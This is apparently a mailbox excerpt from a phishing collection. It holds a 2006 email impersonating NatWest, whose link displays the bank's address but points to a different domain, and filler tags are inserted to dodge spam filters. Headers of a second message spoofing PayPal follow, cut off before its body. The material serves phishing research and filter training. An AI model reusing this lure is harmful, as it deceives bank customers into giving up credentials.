From: support_ref_16193163133@natwest.com
To: nobody@example.com
Content-type: text/html
Subject: NatWest Account service update!
Message-Id: <20060414102640.45EF46CCDC0@mail1.example.com>
Date: Fri, 14 Apr 2006 06:26:40 -0400 (EDT)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 791

Dear NatWest member,<BR><BR>
We want to inform you that our <acz></acz>bank is trying to apply <acp></acp>new antifraud <BR>system <acd></acd>with updating security standards. The new standards <acl></acl>will <BR>guaranty <acn></acn>convenience and safety of <acg></acg>using account. New Security System <BR>of NatWest will be effective immediately.<BR><BR>
Please update your information here:<BR>
<b><a href="http://www.uwold.com/">https://www.nwolb.com/</a></b><BR><BR>
When you've <acq></acq>finished, always 'log <acb></acb>off' from Internet banking and <ack></ack><BR>
if you're <acg></acg>in a public place - please close your <acw></acw>browser. <ach></ach><BR><BR>
Thank you for the assistance,<BR>
NatWest Legal Dept.<BR> 

From admin@paypal.com  Fri Apr 14 20:16:35 2006
Return-Path: <admin@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 89D4A536E3A
	for <nobody@login.example.com>; Fri, 14 Apr 2006 20:16:35 -0400 (EDT)
Received: from 192.168.1.2 (unknown [69.15.4.54])
	by mail2.example.com (Postfix) with SMTP id 62E856FA2BA
	for <nobody@example.com>; Fri, 14 Apr 2006 20:16:35 -0400 (EDT)
Received: from 138.221.240.68 by ; Sat, 15 Apr 2006 02:13:20 +0100
Message-ID: <JKNMFZLZUTPXEXTPKUPKJL@yahoo.com>
